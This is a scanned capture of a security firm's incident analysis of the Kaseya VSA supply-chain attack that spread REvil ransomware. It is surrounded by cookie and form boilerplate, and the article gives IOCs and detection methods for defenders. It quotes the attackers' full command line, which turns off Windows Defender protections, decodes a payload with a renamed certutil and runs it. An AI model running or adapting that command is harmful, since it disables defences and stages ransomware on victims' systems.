www.truesec.com
Open in
urlscan Pro
76.76.21.22
Public Scan
Submitted URL: https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/
Effective URL: https://www.truesec.com/hub/blog/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware
Submission: On May 02 via api from US — Scanned from DE
Effective URL: https://www.truesec.com/hub/blog/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware
Submission: On May 02 via api from US — Scanned from DE
Form analysis 1 forms found in the DOM
POST https://forms.hsforms.com/submissions/v3/public/submit/formsnext/multipart/5907437/e3a542f3-ccea-4df6-b5e3-a9481f7b233b
<form novalidate="" accept-charset="UTF-8" action="https://forms.hsforms.com/submissions/v3/public/submit/formsnext/multipart/5907437/e3a542f3-ccea-4df6-b5e3-a9481f7b233b" enctype="multipart/form-data" id="hsForm_e3a542f3-ccea-4df6-b5e3-a9481f7b233b"
method="POST" class="hs-form stacked hs-form-private hsForm_e3a542f3-ccea-4df6-b5e3-a9481f7b233b hs-form-e3a542f3-ccea-4df6-b5e3-a9481f7b233b hs-form-e3a542f3-ccea-4df6-b5e3-a9481f7b233b_23835f40-376e-4395-87e7-383bf6e87ae8"
data-form-id="e3a542f3-ccea-4df6-b5e3-a9481f7b233b" data-portal-id="5907437" target="target_iframe_e3a542f3-ccea-4df6-b5e3-a9481f7b233b" data-reactid=".hbspt-forms-0">
<div class="hs_email hs-email hs-fieldtype-text field hs-form-field" data-reactid=".hbspt-forms-0.1:$0"><label id="label-email-e3a542f3-ccea-4df6-b5e3-a9481f7b233b" class="" placeholder="Enter your " for="email-e3a542f3-ccea-4df6-b5e3-a9481f7b233b"
data-reactid=".hbspt-forms-0.1:$0.0"><span data-reactid=".hbspt-forms-0.1:$0.0.0"></span></label>
<legend class="hs-field-desc" style="display:none;" data-reactid=".hbspt-forms-0.1:$0.1"></legend>
<div class="input" data-reactid=".hbspt-forms-0.1:$0.$email"><input id="email-e3a542f3-ccea-4df6-b5e3-a9481f7b233b" class="hs-input" type="email" name="email" required="" placeholder="Email adress*" value="" autocomplete="email"
data-reactid=".hbspt-forms-0.1:$0.$email.0" inputmode="email"></div>
</div>
<div class="hs_lifecyclestage hs-lifecyclestage hs-fieldtype-radio field hs-form-field" style="display:none;" data-reactid=".hbspt-forms-0.1:$1"><label id="label-lifecyclestage-e3a542f3-ccea-4df6-b5e3-a9481f7b233b" class=""
placeholder="Enter your Lifecycle stage" for="lifecyclestage-e3a542f3-ccea-4df6-b5e3-a9481f7b233b" data-reactid=".hbspt-forms-0.1:$1.0"><span data-reactid=".hbspt-forms-0.1:$1.0.0">Lifecycle stage</span></label>
<legend class="hs-field-desc" style="display:none;" data-reactid=".hbspt-forms-0.1:$1.1"></legend>
<div class="input" data-reactid=".hbspt-forms-0.1:$1.$lifecyclestage"><input name="lifecyclestage" class="hs-input" type="hidden" value="subscriber" data-reactid=".hbspt-forms-0.1:$1.$lifecyclestage.0"></div>
</div>
<div class="legal-consent-container" data-reactid=".hbspt-forms-0.2">
<div data-reactid=".hbspt-forms-0.2.1:0">
<div class="hs-dependent-field" data-reactid=".hbspt-forms-0.2.1:0.$LEGAL_CONSENT=1subscription_type_6742544">
<div class="hs_LEGAL_CONSENT.subscription_type_6742544 hs-LEGAL_CONSENT.subscription_type_6742544 hs-fieldtype-booleancheckbox field hs-form-field"
data-reactid=".hbspt-forms-0.2.1:0.$LEGAL_CONSENT=1subscription_type_6742544.$LEGAL_CONSENT=1subscription_type_6742544">
<legend class="hs-field-desc" style="display:none;" data-reactid=".hbspt-forms-0.2.1:0.$LEGAL_CONSENT=1subscription_type_6742544.$LEGAL_CONSENT=1subscription_type_6742544.1"></legend>
<div class="input" data-reactid=".hbspt-forms-0.2.1:0.$LEGAL_CONSENT=1subscription_type_6742544.$LEGAL_CONSENT=1subscription_type_6742544.$LEGAL_CONSENT=1subscription_type_6742544">
<ul class="inputs-list" required="" data-reactid=".hbspt-forms-0.2.1:0.$LEGAL_CONSENT=1subscription_type_6742544.$LEGAL_CONSENT=1subscription_type_6742544.$LEGAL_CONSENT=1subscription_type_6742544.0">
<li class="hs-form-booleancheckbox" data-reactid=".hbspt-forms-0.2.1:0.$LEGAL_CONSENT=1subscription_type_6742544.$LEGAL_CONSENT=1subscription_type_6742544.$LEGAL_CONSENT=1subscription_type_6742544.0.0"><label
for="LEGAL_CONSENT.subscription_type_6742544-e3a542f3-ccea-4df6-b5e3-a9481f7b233b" class="hs-form-booleancheckbox-display"
data-reactid=".hbspt-forms-0.2.1:0.$LEGAL_CONSENT=1subscription_type_6742544.$LEGAL_CONSENT=1subscription_type_6742544.$LEGAL_CONSENT=1subscription_type_6742544.0.0.0"><input
id="LEGAL_CONSENT.subscription_type_6742544-e3a542f3-ccea-4df6-b5e3-a9481f7b233b" class="hs-input" type="checkbox" name="LEGAL_CONSENT.subscription_type_6742544" value="true"
data-reactid=".hbspt-forms-0.2.1:0.$LEGAL_CONSENT=1subscription_type_6742544.$LEGAL_CONSENT=1subscription_type_6742544.$LEGAL_CONSENT=1subscription_type_6742544.0.0.0.0"><span
data-reactid=".hbspt-forms-0.2.1:0.$LEGAL_CONSENT=1subscription_type_6742544.$LEGAL_CONSENT=1subscription_type_6742544.$LEGAL_CONSENT=1subscription_type_6742544.0.0.0.1">
<p>By clicking “Submit,” I acknowledge receipt of the Truesec <a href="https://www.truesec.com/privacy-and-terms" rel="noopener">Privacy Policy.</a></p><span class="hs-form-required">*</span>
</span></label></li>
</ul>
</div>
</div>
</div>
<legend class="hs-field-desc checkbox-desc" style="display:none;" data-reactid=".hbspt-forms-0.2.1:0.1"></legend>
</div>
</div>
<div class="hs_submit hs-submit" data-reactid=".hbspt-forms-0.5">
<div class="hs-field-desc" style="display:none;" data-reactid=".hbspt-forms-0.5.0"></div>
<div class="actions" data-reactid=".hbspt-forms-0.5.1"><input type="submit" value="Submit" class="hs-button primary large" data-reactid=".hbspt-forms-0.5.1.0"></div>
</div><noscript data-reactid=".hbspt-forms-0.6"></noscript><input name="hs_context" type="hidden"
value="{"rumScriptExecuteTime":981.5,"rumServiceResponseTime":1576.7000000476837,"rumFormRenderTime":2.100000023841858,"rumTotalRenderTime":1579.6000000238419,"rumTotalRequestTime":459.2000000476837,"renderRawHtml":"true","lang":"en","embedType":"REGULAR","legalConsentOptions":"{\"legitimateInterestSubscriptionTypes\":[6742544],\"communicationConsentCheckboxes\":[{\"communicationTypeId\":6742544,\"label\":\"<p>By clicking “Submit,” I acknowledge receipt of the Truesec <a href=\\\"https://www.truesec.com/privacy-and-terms\\\" rel=\\\"noopener\\\">Privacy Policy.</a></p>\",\"required\":true}],\"legitimateInterestLegalBasis\":\"LEGITIMATE_INTEREST_PQL\",\"processingConsentType\":\"IMPLICIT\",\"processingConsentCheckboxLabel\":\"<p>I agree to allow Truesec Group AB to store and process my personal data. </p>\",\"isLegitimateInterest\":false}","embedAtTimestamp":"1651526253768","formDefinitionUpdatedAt":"1639737105538","pageUrl":"https://www.truesec.com/hub/blog/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware","pageTitle":"Kaseya supply chain attack targeting MSPs to deliver REvil ransomware - Truesec","source":"FormsNext-static-5.483","sourceName":"FormsNext","sourceVersion":"5.483","sourceVersionMajor":"5","sourceVersionMinor":"483","timestamp":1651526253768,"userAgent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36","originalEmbedContext":{"portalId":"5907437","formId":"e3a542f3-ccea-4df6-b5e3-a9481f7b233b","target":"#hs-target-e3a542f3-ccea-4df6-b5e3-a9481f7b233b"},"boolCheckBoxFields":"LEGAL_CONSENT.subscription_type_6742544","renderedFieldsIds":["email","LEGAL_CONSENT.subscription_type_6742544"],"formTarget":"#hs-target-e3a542f3-ccea-4df6-b5e3-a9481f7b233b","correlationId":"2440c2ed-c113-4807-8bf8-04fcf2be48d1","captchaStatus":"NOT_APPLICABLE"}"
data-reactid=".hbspt-forms-0.7"><iframe name="target_iframe_e3a542f3-ccea-4df6-b5e3-a9481f7b233b" style="display:none;" data-reactid=".hbspt-forms-0.8"></iframe>
</form>Text Content
Powered by Cookiebot
* Consent
* Details
* [#IABV2SETTINGS#]
* About
THIS WEBSITE USES COOKIES
We use cookies to personalise content and ads, to provide social media features
and to analyse our traffic. We also share information about your use of our site
with our social media, advertising and analytics partners who may combine it
with other information that you’ve provided to them or that they’ve collected
from your use of their services.
Consent Selection
Necessary
Preferences
Statistics
Marketing
Show details
Necessary 20
Necessary cookies help make a website usable by enabling basic functions like
page navigation and access to secure areas of the website. The website cannot
function properly without these cookies.
Cookiebot
5
Learn more about this provider
CookieConsent [x5]Stores the user's cookie consent state for the current domain
Expiry: 1 yearType: HTTP
Google
3
Learn more about this provider
rc::aThis cookie is used to distinguish between humans and bots. This is
beneficial for the website, in order to make valid reports on the use of their
website.
Expiry: PersistentType: HTML
rc::cThis cookie is used to distinguish between humans and bots.
Expiry: SessionType: HTML
test_cookieUsed to check if the user's browser supports cookies.
Expiry: 1 dayType: HTTP
LinkedIn
1
Learn more about this provider
li_gcStores the user's cookie consent state for the current domain
Expiry: 2 yearsType: HTTP
Stripe
1
Learn more about this provider
mDetermines the device used to access the website. This allows the website to be
formatted accordingly.
Expiry: 2 yearsType: HTTP
campaign.truesec.com
1
__cfruidThis cookie is a part of the services provided by Cloudflare - Including
load-balancing, deliverance of website content and serving DNS connection for
website operators.
Expiry: SessionType: HTTP
checkout.truesec.com
3
PHPSESSIDPreserves user session state across page requests.
Expiry: SessionType: HTTP
wc_cart_hash_#Pending
Expiry: PersistentType: HTML
wc_fragments_#Pending
Expiry: SessionType: HTML
myfonts.net
hubspot.com
2
__cf_bm [x2]This cookie is used to distinguish between humans and bots. This is
beneficial for the website, in order to make valid reports on the use of their
website.
Expiry: 1 dayType: HTTP
play.google.com
youtube.com
2
CONSENT [x2]Used to detect if the visitor has accepted the marketing category in
the cookie banner. This cookie is necessary for GDPR-compliance of the website.
Expiry: 2 yearsType: HTTP
securitysummit.se
geekweek.truesec.com
2
wordpress_test_cookie [x2]Used to check if the user's browser supports cookies.
Expiry: SessionType: HTTP
Preferences 3
Preference cookies enable a website to remember information that changes the way
the website behaves or looks, like your preferred language or the region that
you are in.
Cookiebot
1
Learn more about this provider
CookieConsentBulkSetting-#Enables cookie consent across multiple websites
Expiry: PersistentType: HTML
LinkedIn
2
Learn more about this provider
lang [x2]Remembers the user's selected language version of a website
Expiry: SessionType: HTTP
Statistics 26
Statistic cookies help website owners to understand how visitors interact with
websites by collecting and reporting information anonymously.
Hotjar
2
Learn more about this provider
_hjRecordingLastActivitySets a unique ID for the session. This allows the
website to obtain data on visitor behaviour for statistical purposes.
Expiry: SessionType: HTML
hjViewportIdSets a unique ID for the session. This allows the website to obtain
data on visitor behaviour for statistical purposes.
Expiry: SessionType: HTML
Leadfeeder
1
Learn more about this provider
https://#.#/Registers statistical data on users' behaviour on the website. Used
for internal analytics by the website operator.
Expiry: SessionType: Pixel
LinkedIn
1
Learn more about this provider
AnalyticsSyncHistoryUsed in connection with data-synchronization with
third-party analysis service.
Expiry: 29 daysType: HTTP
Twitter Inc.
1
Learn more about this provider
personalization_idThis cookie is set by Twitter - The cookie allows the visitor
to share content from the website onto their Twitter profile.
Expiry: 2 yearsType: HTTP
geekweek.truesec.com
9
__hsscIdentifies if the cookie data needs to be updated in the visitor's
browser.
Expiry: 1 dayType: HTTP
__hssrcUsed to recognise the visitor's browser upon reentry on the website.
Expiry: SessionType: HTTP
__hstcSets a unique ID for the session. This allows the website to obtain data
on visitor behaviour for statistical purposes.
Expiry: 179 daysType: HTTP
_hjAbsoluteSessionInProgressThis cookie is used to count how many times a
website has been visited by different visitors - this is done by assigning the
visitor an ID, so the visitor does not get registered twice.
Expiry: 1 dayType: HTTP
_hjFirstSeenThis cookie is used to determine if the visitor has visited the
website before, or if it is a new visitor on the website.
Expiry: 1 dayType: HTTP
_hjSession_#Collects statistics on the visitor's visits to the website, such as
the number of visits, average time spent on the website and what pages have been
read.
Expiry: 1 dayType: HTTP
_hjSessionUser_#Collects statistics on the visitor's visits to the website, such
as the number of visits, average time spent on the website and what pages have
been read.
Expiry: 1 yearType: HTTP
_hjTLDTestRegisters statistical data on users' behaviour on the website. Used
for internal analytics by the website operator.
Expiry: SessionType: HTTP
hubspotutkSets a unique ID for the session. This allows the website to obtain
data on visitor behaviour for statistical purposes.
Expiry: 179 daysType: HTTP
geekweek.truesec.com
script.hotjar.com
6
_hjIncludedInPageviewSample [x3]Used to detect whether the user navigation and
interactions are included in the website’s data analytics.
Expiry: 1 dayType: HTTP
_hjIncludedInSessionSample [x3]Registers data on visitors' website-behaviour.
This is used for internal analysis and website optimization.
Expiry: 1 dayType: HTTP
securitysummit.se
geekweek.truesec.com
6
_ga [x2]Registers a unique ID that is used to generate statistical data on how
the visitor uses the website.
Expiry: 2 yearsType: HTTP
_gat [x2]Used by Google Analytics to throttle request rate
Expiry: 1 dayType: HTTP
_gid [x2]Registers a unique ID that is used to generate statistical data on how
the visitor uses the website.
Expiry: 1 dayType: HTTP
Marketing 39
Marketing cookies are used to track visitors across websites. The intention is
to display ads that are relevant and engaging for the individual user and
thereby more valuable for publishers and third party advertisers.
Google
5
Learn more about this provider
IDEUsed by Google DoubleClick to register and report the website user's actions
after viewing or clicking one of the advertiser's ads with the purpose of
measuring the efficacy of an ad and to present targeted ads to the user.
Expiry: 1 yearType: HTTP
pagead/landing [x2]Collects data on visitor behaviour from multiple websites, in
order to present more relevant advertisement - This also allows the website to
limit the number of times that they are shown the same advertisement.
Expiry: SessionType: Pixel
ads/ga-audiencesUsed by Google AdWords to re-engage visitors that are likely to
convert to customers based on the visitor's online behaviour across websites.
Expiry: SessionType: Pixel
pagead/1p-user-list/#Tracks if the user has shown interest in specific products
or events across multiple websites and detects how the user navigates between
sites. This is used for measurement of advertisement efforts and facilitates
payment of referral-fees between websites.
Expiry: SessionType: Pixel
Hotjar
1
Learn more about this provider
_hjRecordingEnabledThis cookie is used to identify the visitor and optimize
ad-relevance by collecting visitor data from multiple websites – this exchange
of visitor data is normally provided by a third-party data-center or
ad-exchange.
Expiry: SessionType: HTML
Hubspot
1
Learn more about this provider
__ptq.gifSends data to the marketing platform Hubspot about the visitor's device
and behaviour. Tracks the visitor across devices and marketing channels.
Expiry: SessionType: Pixel
LinkedIn
4
Learn more about this provider
bcookieUsed by the social networking service, LinkedIn, for tracking the use of
embedded services.
Expiry: 2 yearsType: HTTP
bscookieUsed by the social networking service, LinkedIn, for tracking the use of
embedded services.
Expiry: 2 yearsType: HTTP
lidcUsed by the social networking service, LinkedIn, for tracking the use of
embedded services.
Expiry: 1 dayType: HTTP
UserMatchHistoryUsed to track visitors on multiple websites, in order to present
relevant advertisement based on the visitor's preferences.
Expiry: 29 daysType: HTTP
Meta Platforms, Inc.
2
Learn more about this provider
trUsed by Facebook to deliver a series of advertisement products such as real
time bidding from third party advertisers.
Expiry: SessionType: Pixel
frUsed by Facebook to deliver a series of advertisement products such as real
time bidding from third party advertisers.
Expiry: 3 monthsType: HTTP
Twitter Inc.
1
Learn more about this provider
muc_adsCollects data on user behaviour and interaction in order to optimize the
website and make advertisement on the website more relevant.
Expiry: 2 yearsType: HTTP
YouTube
12
Learn more about this provider
VISITOR_INFO1_LIVETries to estimate the users' bandwidth on pages with
integrated YouTube videos.
Expiry: 179 daysType: HTTP
YSCRegisters a unique ID to keep statistics of what videos from YouTube the user
has seen.
Expiry: SessionType: HTTP
yt.innertube::nextIdRegisters a unique ID to keep statistics of what videos from
YouTube the user has seen.
Expiry: PersistentType: HTML
yt.innertube::requestsRegisters a unique ID to keep statistics of what videos
from YouTube the user has seen.
Expiry: PersistentType: HTML
ytidb::LAST_RESULT_ENTRY_KEYStores the user's video player preferences using
embedded YouTube video
Expiry: PersistentType: HTML
yt-remote-cast-availableStores the user's video player preferences using
embedded YouTube video
Expiry: SessionType: HTML
yt-remote-cast-installedStores the user's video player preferences using
embedded YouTube video
Expiry: SessionType: HTML
yt-remote-connected-devicesStores the user's video player preferences using
embedded YouTube video
Expiry: PersistentType: HTML
yt-remote-device-idStores the user's video player preferences using embedded
YouTube video
Expiry: PersistentType: HTML
yt-remote-fast-check-periodStores the user's video player preferences using
embedded YouTube video
Expiry: SessionType: HTML
yt-remote-session-appStores the user's video player preferences using embedded
YouTube video
Expiry: SessionType: HTML
yt-remote-session-nameStores the user's video player preferences using embedded
YouTube video
Expiry: SessionType: HTML
geekweek.truesec.com
3
_fbpUsed by Facebook to deliver a series of advertisement products such as real
time bidding from third party advertisers.
Expiry: 3 monthsType: HTTP
_gcl_auUsed by Google AdSense for experimenting with advertisement efficiency
across websites using their services.
Expiry: 3 monthsType: HTTP
_lfaUsed in context with Account-Based-Marketing (ABM). The cookie registers
data such as IP-addresses, time spent on the website and page requests for the
visit. This is used for retargeting of multiple users rooting from the same
IP-addresses. ABM usually facilitates B2B marketing purposes.
Expiry: 2 yearsType: HTTP
geekweek.truesec.com
sc.lfeeder.com
8
_lfa [x2]Used in context with Account-Based-Marketing (ABM). The cookie
registers data such as IP-addresses, time spent on the website and page requests
for the visit. This is used for retargeting of multiple users rooting from the
same IP-addresses. ABM usually facilitates B2B marketing purposes.
Expiry: PersistentType: HTML
_lfa_expiry [x3]Contains the expiry-date for the cookie with corresponding name.
Expiry: PersistentType: HTML
_lfa_test_cookie_stored [x3]Used in context with Account-Based-Marketing (ABM).
The cookie registers data such as IP-addresses, time spent on the website and
page requests for the visit. This is used for retargeting of multiple users
rooting from the same IP-addresses. ABM usually facilitates B2B marketing
purposes.
Expiry: 1 dayType: HTTP
registration.socio.events
2
amplitude_unsent_5c62c1c25b9e0178aec337afbd6e86e5Used in context with the
website’s pop-up questionnaires and messengering. The data is used for
statistical or marketing purposes.
Expiry: PersistentType: HTML
amplitude_unsent_identify_5c62c1c25b9e0178aec337afbd6e86e5Used in context with
the website’s pop-up questionnaires and messengering. The data is used for
statistical or marketing purposes.
Expiry: PersistentType: HTML
Unclassified 2
Unclassified cookies are cookies that we are in the process of classifying,
together with the providers of individual cookies.
Reddit
1
Learn more about this provider
snoo.gifPending
Expiry: SessionType: Pixel
registration.socio.events
1
amp_f10087Pending
Expiry: PersistentType: HTML
Cross-domain consent6 Your consent applies to the following domains:
List of domains your consent applies to: live.truesec.com securitysummit.se
geekweek.truesec.com checkout.truesec.com campaign.truesec.com truesec.com
Cookie declaration last updated on 03.04.22 by Cookiebot
[#IABV2_TITLE#]
[#IABV2_BODY_INTRO#]
[#IABV2_BODY_LEGITIMATE_INTEREST_INTRO#]
[#IABV2_BODY_PREFERENCE_INTRO#]
[#IABV2_LABEL_PURPOSES#]
[#IABV2_BODY_PURPOSES_INTRO#]
[#IABV2_BODY_PURPOSES#]
[#IABV2_LABEL_FEATURES#]
[#IABV2_BODY_FEATURES_INTRO#]
[#IABV2_BODY_FEATURES#]
[#IABV2_LABEL_PARTNERS#]
[#IABV2_BODY_PARTNERS_INTRO#]
[#IABV2_BODY_PARTNERS#]
Cookies are small text files that can be used by websites to make a user's
experience more efficient.
The law states that we can store cookies on your device if they are strictly
necessary for the operation of this site. For all other types of cookies we need
your permission.
This site uses different types of cookies. Some cookies are placed by third
party services that appear on our pages.
You can at any time change or withdraw your consent from the Cookie Declaration
on our website.
Learn more about who we are, how you can contact us and how we process personal
data in our Privacy Policy.
Please state your consent ID and date when you contact us regarding your
consent.
[#OOI_PERSONAL_INFORMATION#]
Deny Allow selection Customize
Allow all
Powered by Cookiebot by Usercentrics
* How We Help
CYBERSECURITY CHALLENGES
* IDENTIFY YOUR VULNERABILITIES AND RISKS
* DEVELOP AND MANAGE YOUR IT SECURELY
* DETECT AND RESPOND TO INTRUSION
* RESPOND TO AND QUICKLY OVERCOME A CYBER ATTACK
* GET CYBERSECURITY ADVICE
* HOW WE HELP
ESSENTIAL CYBERSECURITY CAPABILITIES
* * Predict
* Prevent
* Detect
* Respond
* Recover
* OUR SERVICES
* ARE YOU UNDER ATTACK?
Don’t lose valuable time – act now!
* Why Truesec
* Why Truesec
* Who We Are
* Cases
* Our Experts
* Careers
* Knowledge Hub
* Knowledge and Resources
* Events
* Tech Talks
* Trainings
* Blog
* News
* Under attack?
* Get in touch
* How We Help
CYBERSECURITY CHALLENGES
* IDENTIFY YOUR VULNERABILITIES AND RISKS
* DEVELOP AND MANAGE YOUR IT SECURELY
* DETECT AND RESPOND TO INTRUSION
* RESPOND TO AND QUICKLY OVERCOME A CYBER ATTACK
* GET CYBERSECURITY ADVICE
* HOW WE HELP
ESSENTIAL CYBERSECURITY CAPABILITIES
* * Predict
* Prevent
* Detect
* Respond
* Recover
* OUR SERVICES
* ARE YOU UNDER ATTACK?
Don’t lose valuable time – act now!
* Why Truesec
* Why Truesec
* Who We Are
* Cases
* Our Experts
* Careers
* Knowledge Hub
* Knowledge and Resources
* Events
* Tech Talks
* Trainings
* Blog
* News
* Under attack?
* Get in touch
Blog
2021-10-07
A TRUESEC INVESTIGATION
KASEYA SUPPLY CHAIN ATTACK TARGETING MSPS TO DELIVER REVIL RANSOMWARE
Kaseya VSA, a product commonly used by MSPs to manage their clients' IT
environments, It was used as part of a supply chain attack delivering REvil
ransomware to thousands of organizations.
7 min readFabio Viggiani
Share
EDIT 2021-07-04 17:40 CET: Added redacted screenshots of exploit traffic
EDIT 2021-07-04 23.10 CET: Added additional details and attack overview
EDIT 2021-07-05 19.40 CET: Added methods to identify compromised systems
EDIT 2021-07-06 17.14 CET: Added link to script to identify infected systems
EDIT 2021-07-08 14.45 CET: Further clarified the identified steps of the exploit
We have been investigating this issue and our CSIRT team has been working around
the clock to help affected organizations.
We are thankful for all information that other security researchers and response
teams have been sharing, such as Huntress and Kevin Beaumont. So far, we don’t
see any substantial discrepancy between the results of our investigation and the
publicly available IOCs that have been shared.
ATTACK OVERVIEW
Kaseya customers using the on-prem VSA server were affected by this attack. The
VSA server is used to manage large fleets of computers and is normally used by
MSPs to manage all their clients. Without separation between client
environments, this creates a dependency: if the VSA server is compromised, all
client environments managed from this server can be compromised too.
Additionally, if the VSA server is exposed to the internet, any potential
vulnerability could be leveraged over the Internet to breach the server. This is
what happened in this case. The threat actor, an affiliate of the REvil
ransomware-as-a-service, identified and exploited a zero-day vulnerability in
the VSA server.
The vulnerability was exploited to introduce a malicious script to be sent to
all computers managed by the server, therefore reaching all the end clients. The
script delivered the REvil ransomware and encrypted the systems.
Overview of the attack
VSA SERVER ZERO-DAY
We have identified the exploit code used by the threat actor to compromise the
Internet-facing VSA servers. Since a patch has been available since July 11, and
after we have validated the patch and verified that the attack vector is no
longer present, we published the details of the exploit in a follow-up technical
post.
Thank you Visma for extracting traffic data from your DarkTrace appliances and
providing it to us for investigation.
Truesec has confirmed the complete exploit chain and produced a working
proof-of-concept exploit. The following vulnerabilities were chained in the
exploit:
* Authentication Bypass
* Arbitrary File Upload
* Request Forgery Token Bypass
* Local File Code Injection
Attack Kill Chain
We want to share an IP address that we have identified, used to launch the
exploit:
161[.]35.239.148
User-Agent: curl/7.69.1
Organizations and response teams can use this to identify if exploitation was
launched against the VSA servers. Note that as part of the exploitation, the IIS
logs are cleared, therefore a lack of indications in the IIS logs does not
necessarily mean that the system was not exploited.
At this time, we do not know if the threat actor changed the source IP address
for each exploited VSA server, however, we expect a large overlap.
Part of Exploit Against VSA Server
MALICIOUS PROCEDURE TO CLIENTS
The code executed on the VSA server as part of the exploit triggered execution
of a malicious procedure on computers managed by the server. This effectively
reaches all managed clients.
As the first stage deletes logs in multiple locations (IIS logs as well as logs
stored in the application database), not all the steps have been reconstructed
yet. However, the procedure pushed to the clients was recovered and is reported
below.
execFile(): Path="C:\windows\system32\cmd.exe", arg="/c ping 127.0.0.1 -n 7615 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking1\agent.crt c:\kworking1\agent.exe & del /q /f c:\kworking1\agent.crt C:\Windows\cert.exe & c:\kworking1\agent.exe", flag=0x00000002, timeout=0 seconds
This disables some features of Windows Defender, uses certutil to decode the
previously uploaded agent.crt to agent.exe, and executes it.
When executed, agent.exe will drop two additional files: MsMpEng.exe (a
legitimate version of the Windows Defender binary) and mpsvc.dll (REvil
ransomware). The execution of MsMpEng.exe triggers the loading of mpsvc.dll
(side-loading execution) and therefore executes the REvil ransomware in the
context of MsMpEng.exe.
METHODS TO IDENTIFY COMPROMISED SYSTEMS – KASEYA VSA
Truesec has identified several methods to detect if systems are affected. This
is possible both for a device with a Kaseya agent installed, but also on a
central Kaseya VSA server.
Several logs such as the web server and database logs are cleared or deleted on
the Kaseya VSA servers we have investigated. However, we were able to discover
at least one log file that contained valuable data.
In our case, this log file was located at D:\Kaseya\Kserver\Kserver.log”. When
inspecting the content of the file, we were able to find traces of the
“agent.crt” file being sent out to systems.
The log for a specific system looks as follows:
[I 2021-07-02T13:59:59.544250Z +02:00 ] [ProcessCmd] Systemname-and-Kaseya-agent-details (REDACTED) logged in successfully.
[I 2021-07-02T14:00:01.512990Z +02:00 1840 16cc] [EVENT_SERVER] Fri Jul 2 16:00:01 2021: [5836] WARNING: Write File task will rewrite entire file '#agentWrkDir#\agent.crt' to 'Systemname-and-Kaseya-agent-details' (REDACTED) because the timestamp of the file on the server has changed.
[I 2021-07-02T14:00:01.559863Z +02:00 1840 12b4] [EVENT_SERVER] Fri Jul 2 16:00:01 2021: [4788] Write File task continuing previous transfer to file '#agentWrkDir#\agent.crt' at offset 1221800 of 1221802 bytes for 'Systemname-and-Kaseya-agent-details' (REDACTED). Process time = 0 seconds.
These log entries indicate that an attempt was made to send out the file
“agent.crt” to the working directory (default C:\kworking) of the target
machine. As such, it is possible from the central Kaseya VSA servers to identify
which systems were targeted.
We have also confirmed that it is possible that systems are part of the list,
and that an attempt at encrypting them was made, but was unsuccessful.
METHODS TO IDENTIFY COMPROMISED SYSTEMS – SYSTEMS WITH AGENT
On a device that has a Kaseya agent installed, many different indicators exist.
This list contains several methods which have been relevant in the cases we
investigated so far.
ENCRYPTION
* The registry key HKLM:\SOFTWARE\Wow6432Node\BlackLivesMatter which contains
information related to the ransomware
* The ransomware “readme” file and files with the same file ending as the
“-readme.txt” noted prefix
ATTEMPTS TO EXECUTE MALICIOUS CODE
It is possible that there was an attempt at executing the malicious code, but
where the execution was unsuccessful. In such cases the following identification
methods are valuable:
* C:\Windows\System32\winevt\Logs\Windows Powershell.evtx – Check for the
malicious powershell execution “Set-MpPreference -Set-MpPreference
-DisableRealtimeMonitoring ….”
* Any of the files noted in the IoC list. The “C:\kworking” directory is based
on the working directory for the Kaseya agent, which is defined in the
registry key HKLM:\SOFTWARE\Wow6432Node\Kaseya\Agent. Multiple agents can be
installed, and therefore multiple versions of the files.
* Signs of the malicious execution in the Kasey AgentMon log located at:
C:\Program Files (x86)\Kaseya\\AgentMon.log”
* Running process agent.exe
* Running process MsMpEng.exe with loaded mpsvc.dll
We have also released a script to help victims and responders of the Kaseya
ransomware attack to identify and mitigate affected systems. This is for the end
systems, not the VSA servers.
IOCS
161[.]35.239.148
mpsvc.dll 8DD620D9AEB35960BB766458C8890EDE987C33D239CF730F93FE49D90AE759DD
agent.exe D55F983C994CAA160EC63A59F6B4250FE67FB3E8C43A388AEC60A4A6978E9F1E
agent.crt 45AEBD60E3C4ED8D3285907F5BF6C71B3B60A9BCB7C34E246C20410CF678FC0C
YOUTUBE VIDEO
We held a live webinar for approximately 35 minutes to answer many of the
questions we have received.
Due to the nature of the exploit, and the fact that it is zero-day, we are not
disclosing any specific details of the exploit. We have shared the details
directly with Kaseya.
EDIT: since a patch has been available since July 11, and after we have
validated the patch and verified that the attack vector is no longer present, we
published the details of the exploit in a follow-up technical post.
CybersecurityHuman Threat Intel
STAY AHEAD IN CYBER
Join 1000+ other cyber professionals and get our regular updates with cyber
knowledge and technical know-how.
Lifecycle stage
* By clicking “Submit,” I acknowledge receipt of the Truesec Privacy Policy.
*
YOU MIGHT ALSO LIKE...
Go to Knowledge Hub
BLOG
2022-03-07
10 RECOMMENDATIONS TO PREPARE FOR AN ESCALATING CYBER CONFLICT
Mattias Wåhlén
Threat Intelligence6 min read
BLOG
2022-03-02
INCREASED RISK OF DDOS ATTACKS
Mattias Wåhlén
Threat Intelligence4 min read
BLOG
2022-02-24
INCREASED CYBER THREAT TO CRITICAL INFRASTRUCTURE
Mattias Wåhlén
Threat Intelligence5 min read
BLOG
2022-02-17
A FIRST STEP TOWARDS BUILDING A CYBER THREAT INTELLIGENCE CAPABILITY
Christoffer Strömblad
Threat Intelligence7 min read
REPORT
THREAT INTELLIGENCE REPORT 2022
Cybersecurity1 min min read
REPORT
THREATS TO THE SWEDISH FINANCIAL SECTOR IN 2021
Cybersecurity1 min min read
REPORT
THREAT INTELLIGENCE REPORT 2021
Threat Intelligence1 min min read
BLOG
2021-07-05
ORIGIN OF THE KASEYA BREACH
Mattias Wåhlén
Threat Intelligence3 min read
BLOG
2021-05-05
ARE EVIL CORP ACTUALLY RUSSIAN SPIES?
Mattias Wåhlén
Threat Intelligence12 min read
TECH TALK
ARE THE NOTORIOUS EVIL CORP ACTUALLY RUSSIAN SPIES?
Fabio Viggiani
Mattias Wåhlén
HOW WE HELP
